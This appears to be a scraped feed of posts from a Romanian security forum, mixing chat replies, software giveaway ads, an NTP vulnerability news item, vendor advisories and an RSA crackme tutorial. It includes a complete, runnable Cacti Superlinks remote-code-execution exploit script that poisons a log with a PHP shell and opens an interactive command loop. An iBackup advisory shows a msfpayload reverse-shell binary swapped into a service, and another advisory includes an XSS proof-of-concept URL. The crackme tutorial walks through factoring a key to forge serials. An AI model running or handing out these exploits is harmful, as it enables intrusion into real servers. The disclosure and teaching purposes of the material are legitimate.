Aerosol

nu ne arati si noua de ce esti in stare? ceva creeat de tine, sunt curios. ex: un wallpaper pentru RST. @badboy17 ai combinat frumos cele doua imagini, bravo.

Click Dreapta -> Afiseaza sursa paginii ( mai simplu apesi CTRL+U ) sau si mai simplu dai copy/paste la adresa url si pui in fata view-source: Apoi o sa se deschida o pagina : presupunem ca site-ul tau e www.filmehd.ro eh adresa URL va fi: view-source:www.filmehd.ro apoi te uiti in sursa pana dai de ceea ce cauti:

Ce dovada sa iti dea bre, e clara treaba vrea sa se razbune pe administratori/comunitate si sa ii faca altii treaba, e ceva de genu: eu am spart site-ul deja dar da-mi metoda ta sa vad daca e ca a mea...

Nu e acelasi lucru omule, nu vezi?

Sa traduci din romana in engleza, daca e asa te pot ajuta si eu.

@Cronicles <center> Partea 1 <iframe width="700" height="360" scrolling="no" frameborder="0" src="http://videomega.tv/iframe.php?ref=XUHbVFNIQNNQINFVbHUX&width=700&height=360" allowFullScreen></iframe> Partea 2 <iframe width="700" height="360" scrolling="no" frameborder="0" src="http://videomega.tv/iframe.php?ref=YeAgBXZdDIIDdZXBgAeY&width=700&height=360" allowFullScreen></iframe> Partea 3 <iframe width="700" height="360" scrolling="no" frameborder="0" src="http://videomega.tv/iframe.php?ref=KOUQYcXIHTTHIXcYQUOK&width=700&height=360" allowFullScreen></iframe> </center> view-source:http://www.topvideohd.com/2013/05/avatar-2009-online-subtitrat-in-romana.html

DxO Optics Pro 8 Elite is a photo and image processing program that enhances and improves your photos and images using advanced algorithms and techniques — automatically. Want more features? Get DxO Optics Pro 10 Elite with free updates, the latest and greatest version of DxO Optics Pro! Also be sure to check our Active Sales list for more free and discounted software! Sale ends in 41 days 22 hrs 21 mins Free DxO Optics Pro 8 Elite (100% discount)

Ashampoo Internet Accelerator 3 is a program that aims to do things: boost your connection speed by optimizing internet-related settings and clean your internet-related privacy traces. Want more features? Upgrade to Ashampoo WinOptimizer 11, which has all the internet optimization and privacy cleaning features of Ashampoo Internet Accelerator 3 plus more. Also be sure to check our Active Sales list for more free and discounted software! Sale ends in 2 days 22 hrs 24 mins Free Ashampoo Internet Accelerator 3 (100% discount)

Bitdefender Total Security 2015 is an all-in-one security package for your computer. It provides protection against malware (viruses, trojans, spyware, adware, etc.), has a built-in firewall, helps guard online transactions, protects your privacy, and more. Also be sure to check our Active Sales list for more free and discounted software! Sale ends in 1 day 22 hrs 24 mins Free 1-Year License Bitdefender Total Security 2015 (100% discount)

@ICEBREAKER101010 asta sa crezi tu, ca daca ai linux nu au ce faca bla,bla,bla, nu-s asa de prostii. Omule se vede ca nu ai citit/inteles aceasta stire, mai citeste-o o data, de doua, de zece ori pana o sa o intelegi, hai sa nu facem offtopic inceteaza cu aberatiile...

@Cronicles lasa-mi link cu acel site.

Researchers at Google have uncovered several serious vulnerabilities in the Network Time Protocol and experts warn that there are exploits publicly available for some of the bugs. The vulnerabilities are present in all versions of NTP prior to 4.2.8 and include several buffer overflows that are remotely exploitable. The NTP is a protocol that’s used to synchronize the time on servers across networks. It’s ubiquitous and that fact has made it a useful tool for attackers in DDoS attacks in recent years. Attackers have taken advantage of a weakness in NTP to amplify DDoS attacks. “The reason has to do with the amplification factor,” said Arbor Networks solutions architect Gary Sockrider in April. “With NTP reflection attacks, you get 1000 times the amplification; 1000 times the size of the query is reflected back. There’s more cause for alarm with NTP attacks because attackers get a better response rate.” The flaws disclosed today in NTP are more worrisome. They put servers running older versions of the protocol at risk of remote code execution. “Google Security Team researchers Neel Mehta and Stephen Roettger have coordinated multiple vulnerabilities with CERT/CC concerning the Network Time Protocol (NTP). As NTP is widely used within operational Industrial Control Systems deployments, NCCIC/ICS-CERT is providing this information for US Critical Infrastructure asset owners and operators for awareness and to identify mitigations for affected devices,” an advisory from ICS-CERT says. “These vulnerabilities could be exploited remotely. Exploits that target these vulnerabilities are publicly available.” The advisory from NTP.org says that a single packet is enough to exploit any of the buffer overflow vulnerabilities. “A remote attacker can send a carefully crafted packet that can overflow a stack buffer and potentially allow malicious code to be executed with the privilege level of the ntpd process,” the advisory says. Source

@Cronicles sa zicem ca asta e video-ul tau: http://videomega.tv/?ref=AJWOLaJQKbbKQJaLOWJA# dai pana in josul pagini unde scrie

#!/bin/sh ############## # Exploit Title: Cacti - Superlinks Plugin 1.4-2 RCE(LFI) via SQL Injection # Date: 19/12/2014 # Exploit Author: Wireghoul # Software Link: http://docs.cacti.net/plugin:superlinks # Identifiers: CVE-2014-4644, EDB-ID-33809 # Exploit explanation through inline comments # Patch provided at the end # # This is the year where hope fails you -- Slipknot: Pulse of the maggots # ############## echo -e "\e[32m *-*, \e[31m ___________" echo -e "\e[32m ,*\/|\`| ; \e[31m /.'_______\`.\\" echo -e "\e[32m \\' | |'; *, \e[31m /( (_______\`-'\\" echo -e "\e[32m \ \`| | ;/ ) \e[31m \`.\`.______ \.'" echo -e "\e[32m : |'| , / \e[31m \`..-.___>.'" echo -e "\e[32m :'| |, / \e[31m \`.__ .'\e[0m" echo -e " _________\e[32m:_|_|_;\e[0m_______________\e[31m\`.'\e[0m_______[Wireghoul]___" echo -e " CACTI SUPERLINKS PLUGIN 1.4-2 REMOTE CODE EXECUTION PoC" echo if [ -z $1 ]; then echo -e "Usage $0 <superpluginurl>\n $0 http://example.com/cacti/plugins/superlinks/superlinks.php\n"; exit 2; fi # This exploit is a second order LFI through SQLI, so first we must write some data to disk # Luckily the application logs all sort of stuff, so lets poison the application log # The reason for this is manyfold, read on. curl --silent "$1?id=SHELL<?php+passthru(\$_GET\[c\])+?>LLEHS<?php+exit+?>" > /dev/null # Now lets analyse the vulnerability: # superlinks.php:21:if (isset($_GET['id'])) { # superlinks.php:22: $pageid=$_GET['id']; # superlinks.php:23:} # superlinks.php:24: # superlinks.php:25:$page = db_fetch_row("SELECT DISTINCT # superlinks.php:26: id, # superlinks.php:27: title, # superlinks.php:28: style, # superlinks.php:29: contentfile # superlinks.php:30: FROM (superlinks_pages, superlinks_auth) # superlinks.php:31: WHERE superlinks_pages.id=superlinks_auth.pageid # superlinks.php:32: AND id=" . $pageid . " # This is where the injection occurs, we can now union select 1,2,3,4 -- ftw # However the real fun occurs a few lines later # superlinks.php:57: $my_file = $config["base_path"] . "/plugins/superlinks/content/" . $page['contentfile']; # superlinks.php:58: # superlinks.php:59: if (file_exists($my_file)) { # superlinks.php:60: @InClude_once($my_file); # We can now include a file of our choosing (LFI) based on the data returned from the SQLi # There are only a few problems: # * We cannot use strings/quotes as magic quotes are usually on # * We do not know the local path for the LFI # * Usual tricks like /proc/self* have been patched # * Database server and web server may be different hosts # Lets solve the easy one first, we dont need to quote our strings, hex encoding works great # The second one is a little trickier, we can brute force LFI locations... or # We can dynamically locate a file path which is stored in the database and present on the webserver # $ mysqldump cacti | grep '\.log' # INSERT INTO `settings` VALUES ('path_php_binary','/usr/bin/php'),('path_rrdtool','/usr/bin/rrdtool'),('poller_lastrun','1414565401'),('path_webroot','/usr/share/cacti/site'),('date','2014-10-29 17:50:02'),('stats_poller','Time:0.1182 Method:cmd.php Processes:1 Threads:N/A Hosts:2 HostsPerProcess:2 DataSources:0 RRDsProcessed:0'),('stats_recache','RecacheTime:0.0 HostsRecached:0'),('path_snmpwalk','/usr/bin/snmpwalk'),('path_snmpget','/usr/bin/snmpget'),('path_snmpbulkwalk','/usr/bin/snmpbulkwalk'),('path_snmpgetnext','/usr/bin/snmpgetnext'),('path_cactilog','/var/log/cacti/cacti.log'),('snmp_version','net-snmp'),('rrdtool_version','rrd-1.4.x'),('superlinks_tabstyle','0'),('superlinks_hidelogo','0'),('superlinks_hideconsole','0'),('superlinks_db_version','1.4'),('auth_method','1'),('guest_user','guest'),('user_template','0'),('ldap_server',''),('ldap_port','389'),('ldap_port_ssl','636'),('ldap_version','3'),('ldap_encryption','0'),('ldap_referrals','0'),('ldap_mode','0'),('ldap_dn',''),('ldap_group_require',''),('ldap_group_dn',''),('ldap_group_attrib',''),('ldap_group_member_type','1'),('ldap_search_base',''),('ldap_search_filter',''),('ldap_specific_dn',''),('ldap_specific_password',''); # $ ls -la /var/log/cacti/cacti.log # -rw-r----- 1 www-data www-data 5838 Oct 29 17:50 /var/log/cacti/cacti.log # $ tail /var/log/cacti/cati.log # <snip> ERROR: SQL Assoc Failed!, Error:'1064', SQL:"SELECT graph_templates.id, graph_templates.name FROM (graph_local,graph_templates,graph_templates_graph) WHERE graph_local.id=graph_templates_graph.local_graph_id AND graph_templates_graph.graph_template_id=graph_templates.id AND graph_local.host_id=1 AND graph_templates.id=12 select 1,2,3,4 -- GROUP BY graph_templates.id ORDER BY graph_templates.name" # WINRAR! # We can now include the poisoned log file by fetching the log path from the database # and prepending it with the normal directory traversal pattern ../../../ using concat() # We traverse 8 deep, that's usually enough echo -ne "Dropping into shell, type exit to quit.\ncactishell> " while read line; do if [ "$line" == "exit" ]; then exit fi comand=`echo -n $line | sed -e's/ /+/g'` curl --silent "$1?id=123+union+select+1,2,3,concat(0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f,value)+from+settings+where+name=0x706174685f63616374696c6f67+--+-&c=$comand" | \ sed -n '/SHELL/, $p' | \ sed -e 's/.*SHELL//' |\ sed '/LLEHS/, $d' echo -n "cactishell> " done # Proposed patch # Vendor has a patch in a SVN repo somewhere: # [url]http://bugs.cacti.net/bug_view_advanced_page.php?bug_id=2475[/url] # Yet has not made the patch available, or responded to requests to do so: # [url]http://forums.cacti.net/viewtopic.php?t=53711[/url] #--- superlinks.php 2014-12-18 02:05:37.706013833 -0500 #+++ superlinks.php 2014-12-18 02:05:09.694014497 -0500 #@@ -19,7 +19,7 @@ # # $pageid = 0; # if (isset($_GET['id'])) { #- $pageid=intval($_GET['id']); #+ $pageid=$_GET['id']; # } # # $page = db_fetch_row("SELECT DISTINCT Source

SEC Consult Vulnerability Lab Security Advisory < 20141219-0 > ======================================================================= title: XSS & Memory Disclosure product: NetIQ eDirectory NDS iMonitor vulnerable version: 8.8 SP8, 8.8 SP7 fixed version: 8.8 SP8 HF 4, fix available for versions 8.8 SP7 (8.8.7.4 HF 4, 8.8.7.6 HF 3) CVE number: CVE-2014-5212, CVE-2014-5213 impact: High homepage: https://www.netiq.com/ found: 2014-10-29 by: W. Ettlinger SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor description: ----------------------------- "eDirectory(TM) is a full-service, secure LDAP directory providing incredible scalability and an agile platform to run your organization's identity infrastructure and multi-platform network services." URL: https://www.netiq.com/products/edirectory/ Business recommendation: ------------------------ An attacker without an account on the NetIQ eDirectory NDS iMonitor is able to gain administrative access by luring an authenticated administrator to visit an attacker-controlled web site. Moreover, an authenticated attacker is able to retrieve internal data which potentially contains sensitive data. As the NetIQ eDirectory is often used to maintain a centralized user database it is a very attractive target for an attacker. By compromising this system, an attacker may be able to conduct further attacks on other systems. SEC Consult recommends to immediately conduct a full security review of this software, especially if used as a centralized user database. Vulnerability overview/description: ----------------------------------- 1) Memory Disclosure (CVE-2014-5213) Using crafted HTTP requests an administrative user can retrieve parts of the virtual memory from the service. This potentially discloses secret data like passwords. 2) Reflected Cross Site Scripting (XSS, CVE-2014-5212) A reflected cross site scripting vulnerability was identified. An attacker could take over the user account of a valid administrator. Proof of concept: ----------------- 1) Memory Disclosure (CVE-2014-5213) When accessing the following URL as an authenticated user, parts of the virtual memory can be retrieved: https://<host>:8030/nds/files/opt/novell/eDirectory/lib64/ndsimon/public/images 2) Reflected Cross Site Scripting (XSS, CVE-2014-5212) The following URL demonstrates a reflected XSS flaw: https://<host>:8030/nds/search/data?scope=st&rdn=%3C/script%20%3E%3Cscript%20%3Ealert%28%22XSS%22%29%3C/script%20%3E Vulnerable / tested versions: ----------------------------- The vulnerabilities have been verified to exist in the NetIQ eDirectory NDS iMonitor version 8.8 SP8, which was the most recent version at the time of discovery. Vendor contact timeline: ------------------------ 2014-10-29: Contacting security@netiq.com, sending responsible disclosure policy and PGP keys 2014-10-29: Vendor redirects to security@novell.com, providing PGP keys through Novell support page 2014-10-30: Sending encrypted security advisory to Novell 2014-10-30: Novell acknowledges the receipt of the advisory 2014-11-18: Novell: the vulnerabilities have been fixed by development; the patches will be release end of November 2014-12-08: Novell: the release has been pushed to Dec. 8th 2014-12-09: Novell: the release 8.8.8.4 should be released tomorrow; The hotfix for 8.8.7.6 is still pending 2014-12-17: Verifying release of advisory; asking whether patches have been released 2014-12-18: Novell: Patches have been released 2014-12-19: Coordinated release of security advisory Solution: --------- Update to the release 8.8.8.4 or apply fix for versions 8.8 SP 7. Workaround: ----------- No workaround available. Advisory URL: ------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich Headquarter: Mooslackengasse 17, 1190 Vienna, Austria Phone: +43 1 8903043 0 Fax: +43 1 8903043 15 Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult Interested to work with the experts of SEC Consult? Write to career@sec-consult.com EOF W. Ettlinger / @2014 Source

Document Title: =============== iBackup v10.0.0.45 - Privilege Escalation Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1382 Release Date: ============= 2014-12-18 Vulnerability Laboratory ID (VL-ID): ==================================== 1382 Common Vulnerability Scoring System: ==================================== 6.2 Product & Service Introduction: =============================== With IBackup, you can backup/restore interactively or schedule regular online backups for Windows desktops, laptops and servers. It has a simple, user- friendly interface coupled with powerful scheduling and logging features. IBackup automatically selects critical data (Desktop, Music, Pictures, Videos, Documents, Windows Mail, Favourites) for backup. Advanced features include Open file Backup, System State backup, MS SQL Server, MS Exchange Server, Hyper-V, MS SharePoint Server and Oracle Server backups. (Copy of the Vendor Homepage: https://www.ibackup.com/ibwin/downloads/IBackupsetup.exe ) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered a a local privilege escalation vulnerability in the official Pro Softnet Corporation iBackup v10.0.0.45 software. Vulnerability Disclosure Timeline: ================================== 2014-12-18: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Pro Softnet Corporation Product: iBackup - Server Software 10.0.0.45 Exploitation Technique: ======================= Local Severity Level: =============== High Technical Details & Description: ================================ A local privilege escalation vulnerability has been discovered in the official iBackup v10.0.0.45 software. The vulnerability allows local attackers to gain higher access privileges by execution of arbitrary codes. The `ibservice` service for windows could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user`s code would execute with the elevated privileges of the application. The security risk of the privilege escalation vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.2. Exploitation of the vulnerability requires a local privileged systen user account without user for interaction. Successful exploitation of the arbitrary code execution vulnerability results in software- or system compromise. Proof of Concept (PoC): ======================= The vulnerability can be exploited by local attackers with low privileged or restricted system user account and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. --- PoC Session Logs --- C:\Users\s-dz\Desktop>sc qc ibservice [SC] QueryServiceConfig réussite(s) SERVICE_NAME: ibservice TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files\IBackupWindows\ib_service.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : IBackup Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem* - C:\Users\s-dz\Desktop>sc qc ibservice [SC] QueryServiceConfig réussite(s) SERVICE_NAME: ibservice TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files\IBackupWindows\ib_service.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : IBackup Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem - C:\Users\s-dz\Desktop>accesschk.exe -dqv "C:\Program Files\IBackupWindows\" C:\Program Files\IBackupWindows Medium Mandatory Level (Default) [No-Write-Up] RW Tout le monde FILE_ADD_FILE FILE_ADD_SUBDIRECTORY FILE_LIST_DIRECTORY FILE_READ_ATTRIBUTES FILE_READ_EA FILE_TRAVERSE FILE_WRITE_ATTRIBUTES FILE_WRITE_EA DELETE SYNCHRONIZE READ_CONTROL RW NT SERVICE\TrustedInstaller FILE_ALL_ACCESS RW AUTORITE NT\SystÞme FILE_ALL_ACCESS RW BUILTIN\Administrateurs FILE_ALL_ACCESS R BUILTIN\Utilisateurs FILE_LIST_DIRECTORY FILE_READ_ATTRIBUTES FILE_READ_EA FILE_TRAVERSE SYNCHRONIZE READ_CONTROL ############## PROOF C:\Users\s-dz\Desktop>net user s-dz Nom d'utilisateur s-dz Nom complet s-dz Commentaire Commentaires utilisateur Code du pays 000 (Valeur par défaut du système) Compte : actif Oui Le compte expire Jamais Mot de passe : dernier changmt. 18/12/2014 01:12:55 Le mot de passe expire Jamais Le mot de passe modifiable 18/12/2014 01:12:55 Mot de passe exigé Oui L'utilisateur peut changer de mot de passe Oui Stations autorisées Tout Script d'ouverture de session Profil d'utilisateur Répertoire de base Dernier accès 18/12/2014 06:04:49 Heures d'accès autorisé Tout Appartient aux groupes locaux *Utilisateurs Appartient aux groupes globaux *None La commande s'est terminée correctement. C:\Users\s-dz\Desktop> root@samir:~# msfpayload windows/shell_reverse_tcp lhost='192.168.1.5' lport='4433' X > C:\Users\s-dz\Desktop\evil-ZDserv.exe C:\Users\s-dz\Desktop>copy evil-ZDserv.exe "C:\Program Files\IBackupWindows\ib_service.exe" Remplacer C:\Program Files\IBackupWindows\ib_service.exe (Oui/Non/Tous) : o 1 fichier(s) copié(s). e will open cmd with administrator for start service ibservice C:\Users\s-dz\Desktop>sc start ibservice now nc ... (user) C:\Users\s-dz\Desktop>nc.exe -lvp 4433 listening on [any] 4433 ... connect to [192.168.1.5] from s-dz [192.168.1.5] 16040 Microsoft Windows [version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. Tous droits réservés. C:\Windows\system32>whoami whoami autorite nt\système C:\Windows\system32> Security Risk: ============== The security risk of the of the local privilege escalation software vulnerability in the root path is estimated as high. (CVSS 6.2) Credits & Authors: ================== Hadji Samir S-dz@hotmail.fr Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source

@AndreiMihai nu o sa reusesti sa faci nimic cu cei 1.200 euro, daca ar fi asa usor la toate...

Introduction Hopefully you are familiar with Assembly language and have some little knowledge on how to use reverse engineering tools such as Debuggers, Disassemblers, PE Analyzers, etc. This article will only concentrate on the RSA cryptosystem and how to reverse it to get a valid key for your name. We will be targeting a challenge made especially for this tutorial to demonstrate how to do that. Tools Needed Assuming you’ve already got the required knowledge on how to use reverse engineering tools, these are the essential tools for this article (the download links are in the bottom): The target file (CryptoChallenge1.exe) IDA (Interactive Disassembler): Disassembler for computer software which generates assembly language source code from machine-executable code. OllyDBG: An x86 debugger that emphasizes binary code analysis, which is useful when source code is not available. PEiD: PE analyzes tool, detects most common packers, cryptors and compilers for PE files, it also detects hashes and cryptographic algorithms used in the PE file. RE-SIGS: IDA signature file to detect libraries used by programs. GODUP: OllyDBG plugin to load IDA signature files. RSA-Tool: Useful for generation of key pairs, encryption/decryption and also integer factorization (and that’s what we will use it for). TiBiNuCa: A Tiny Big Number Calculator (requires dotNetFx4). What is RSA? RSA is a public-key cryptosystem. It was developed in 1977 by Ronald Rivest, Adi Shamir and Leonard Adleman. The fact that it’s a public-key cryptosystem means that it uses a public and a private key for the encryption/decryption of data. Its strength lies in the integer factorization problem (the larger the number, the harder and longer it will take to factorize) commonly known as the RSA Problem. RSA uses the following parameters: P: 1st large prime number. Q: 2nd large prime number. E: Public Exponent. N: Public Modulus. D: Private Exponent. Key generation Choose a key length (measured in bits). Generate the two random prime numbers P and Q. Choose a public exponent E such that GCD(E, (P-1)*(Q-1))==1), the most commonly used number is 65537. Compute the Public Modulus N = P * Q. Determine the Private Exponent (D) using the Modular multiplicative inverse formula D=E^(-1) mod ((P-1)*(Q-1)). The symbol (^) is used as the Exponent and not the XOR operator. (Mod) means modulo/modulus in computing and is an operation that finds the remainder of the division of one number by another. D must be kept private and must never be published! Alongside P and Q. Encryption To encrypt a message (M) (where M < N), we would use the following formula: C = M ^ E mod N Decryption To decrypt a given cipher © we would use the following formula: M = C ^ D mod N Example (in base 16) By following the steps above: Let’s choose a Keysize: 32 bits (which is totally unsecure). P = 2F6DB Q = 19CD3 E = 10001 (base 16 of 65537). N = P*Q = 4C7B9EA81 D = E^(-1) mod ((P-1)*(Q-1)) = 10001^(-1) mod ( (2F6DB-1) * (19CD3-1) ) = 10001^(-1) mod (2F6DA * 19CD2) = 10001^(-1) mod (4C7B556D4) = 72C6E47D That was calculated using TiBiNuCa: Now that we have our key pairs, we can encrypt our message: M = InfoSec which equals 49 6E 66 6F 53 65 63 in base 16. And since M > N we can split M into blocks smaller than N (M<N) as follows: 496E666F ^ 10001 mod 4C7B9EA81 = 143B30CF8 00536563 ^ 10001 mod 4C7B9EA81 = 380323BEB C = 143B30CF8380323BEB Now in order to decrypt the above cipher we should have the Private Exp (D) but what happens if we don’t! That’s where the factorization comes. That’s the job of RSA-Tool. (We’ll see how to do Factor N later). 143B30CF8 ^ 72C6E47D mod 4C7B9EA81 = 496E666F 380323BEB ^ 72C6E47D mod 4C7B9EA81 = 536563 M = 496E666F536563 = InfoSec. Target analyses Let’s try to apply all of the above in our challenge. I always check the target before everything, so that’s what we will do. Open up the target “CryptoChallenge1.exe” and Type any Name/Serial, I’ve typed my name, and for the serial I had to make many tries before it gave me that message “SERiAL STATUS: UNREGiSTERED” (the target checks for the serial’s length). Now we analyze our target to see if it’s packed/protected. As you can see, the analysis shows it was compiled using MASM32 / TASM32. But the crypto analysis using KANAL shows the target has some crypto inside (MD5 and BigLib: an assembly bignum library) Alright, now that we know what we’re dealing with, we will use IDA to extract these cryptos’ signatures from our target. To do that you should have the sig file “RE-SIGS” (download link in the bottom). PS: Before opening IDA, you should copy the signature file “RE-SIGS” in the folder IDAsig. Open the target in IDA and go to menu View > Open subviews > Signatures or just press Shift+F5. A list of applied library modules shows up. To apply a new signature, you can either press “Ins” or right-click > Apply new signatures. A new window will show up. Choose RESIGS and click OK. You will be able to see the changes in the functions window. 33 functions were applied, which means it has found the crypto algorithms and libraries and has given them their real names. Now we will export this result so that we can use it in our debugger. To do that, go to File > Produce file > Create MAP file as shown below: Save your file in a place you can remember, and leave the MAP file options as they are, as shown below (just click OK). Now that we have our map file, let’s debug. PS: Before opening OllyDBG you should put the plugin “GODUP Plugin” in the plugins section of the debugger you’re using, because that’s what we will be using to import our map file. Fire up the target file into OllyDbg and go to: Plugins > GODUP Plugin > Map Loader > Load labels And choose the map file you’ve saved before. The code is easy and simple, there are the initial API’s that load the PE file and after that there is GetDlgItemTextA (gets a text from an editbox/textbox and puts it in a buffer). Let’s put a breakpoint on that API and see what it really gets (simple click on address 0040107A and press F2). The tracing shows that the API is used to get the typed name. The target then checks if a name was typed, or it will show a text saying “NAME STATUS : NO NAME”, after that it checks if the length of the name is longer than 15 (CMP EAX,0F) and shorter than 3 (CMP EAX,3). If the name is longer than 3 and shorter than 15, it jumps to another GetDlgItemTextA API that gets the typed serial and does the same as for the name checks, except that the length must not be longer than 64 (CMP EAX,40) and not shorter than 63 (CMP EAX,3F). If everything is good, it will jump to address 0x40115A, which calls another address: CALL 0×401189. What might that address (00401189) contain? Let’s go check it out, shall we! The address sends us to the challenge’s RSA routine shown below: The tracing of that function shows that: lstrlenA at 0x40118E is used to get the length of our name, and then that length is moved to EBX. The three following calls (MD5Init, MD5Update and MD5Final) generate the MD5 hash for the name. That hash is then converted to Hexadecimal using HexEncode at 0x4011B2 and is put in address 0×407847. The calls (0x4011B9, 0x4011C5, 0x4011D1 and 0x4011DD) reference to BigCreate. This API is used by BigLib to create a bignumber and initializes it with the value InitValue. The three next calls (0x4011F4, 0×401206 and 0×401218) reference to BigIn, which is used to fill the given bignumber with the null-terminated string in base (16 in this case). Here is an example of that function: PUSH output // our bignumber buffer PUSH 16 // base PUSH input // (typed serial, public modulus n, public exponent e) CALL _BigIn Now we have: 0x4083F8 = Serial in bignum. 0×408400 = Public Modulus (N) in bignum. 0×408404 = Public Exponent (E) in bignum. N = 8640FF9C022F0FB3447F82C6F23CA36703741985A9E35EE670B36B6553926A9D E = 10001 Next is the call at 0×401235 is a reference to the function BigPowMod, which is the encryption formula, used as follows: 0x4083FC = 0x4083F8 ^ 0×408404 mod 0×408400 or C=Serial^E mod N After that, a call at 0×401247 to BigOut function. It is the opposite of BigIn, convert from bignumber to base 16 string. The result is put in 0x407C47. Next comes the algorithm from 0x40124C to 0x40126E which has a loop that compares each character from 0×407847 (md5 hash of our name) with each character from 0x407C47 (our Serial). It is easy to make it accept any serial just by patching the JNZ at 0×401266 into NOP’s. But that’s not ideal. The JNZ at 0×401266 inside the loop checks if two characters are equal, if not it jumps to address 0×401290 that has a SetDlgItemTextA which outputs “SERiAL STATUS: UNREGiSTERED”, or it doesn’t jump and shows “SERiAL STATUS: REGiSTERED”. After each SetDlgItemTextA call, there are two calls (CALL 0x4012B0) and (CALL 0x4012DE). 0x4012B0 is a function that has three calls to RtlZeroMemory which is used to clear the data. 0x4012AA is a function that has four calls which reference to BigDestroy. It destroys the bignums that were created by BigCreate. This is what we know so far: The Name must be longer than 3 and shorter than 15 characters. The Serial must contain either 63 or 64 characters. N = 8640FF9C022F0FB3447F82C6F23CA36703741985A9E35EE670B36B6553926A9D E = 10001 The target compares the MD5 hash of the Name with the result of the BigPowMod (C=Serial^E mod N). The Public Exponent N is 256 bits. The serial should be in base 16. Alright, now we need to reverse C=Serial^E mod N into M=C^D mod N (remember RSA’s Encryption/Decryption formulas!) so that we can get a valid serial. For that we need to factor N to get the Private Exponent D. Load up RSA-Tool and copy the N into the Modulus N textbox (to get the keysize click Exact size) and click Factor N and wait until it finds P and Q. This will take a while depending on the computer you’re using (it took 1h in my computer). Once the tool finishes factoring, you will see P and Q textboxes filled: P = 960A589F7B9AA6E2FBF05A5F5E507465 Q = E5109FD956BC44F85A6B0CF071A22DD9 Now click “Calc. D.” D = 82CC4CBC47FC65C57814EAEABD128AF6DEB2475AE59DF66F78C90BA1924D57 C1 Now that we have our Private Exponent, let’s calculate our valid serial: We know that the encryption formula is: C = Serial ^ E mod N And: C must be equal to MD5(NAME) which means C=MD5(NAME) So the decryption formula must be: Serial = C ^ D mod N Let’s try that out: NAME = Jamal Chahir C = MD5(NAME) = 4D945493477571DE563E281CA4145EB9 D = 82CC4CBC47FC65C57814EAEABD128AF6DEB2475AE59DF66F78C90BA1924D57C1 N = 8640FF9C022F0FB3447F82C6F23CA36703741985A9E35EE670B36B6553926A9D Serial = C ^ D mod N The calculation in TiBiNuCa gives us the following result as you can see below: 20F9C3683546ECDBF4F4469525B1DE915056F81E6708F78B7210858E40D25416 Trying that on the challenge gives us the right message. Conclusion In this article, I have shown you how the RSA cryptosystem works and how to reverse it. I hope all of this was clear enough and that you’ve learned something new from it. Download links: IDA : https://www.hex-rays.com/products/ida OllyDBG: OllyDbg v1.10 PEiD: PEiD Download - Softpedia RSA-Tool: https://tuts4you.com/download.php?view.455 RE-SIGS: https://tuts4you.com/download.php?view.3407 GODUP: https://tuts4you.com/download.php?view.54 TiBiNuCa: https://www.dropbox.com/s/4dipnjrlggrpz1w/TiBiNuCa.rar?dl=0 Target: https://www.dropbox.com/s/4va2kyqyd729hjd/CryptoChallenge1.rar?dl=0 Sources: en.wikipedia.org/wiki/RSA_(cryptosystem)

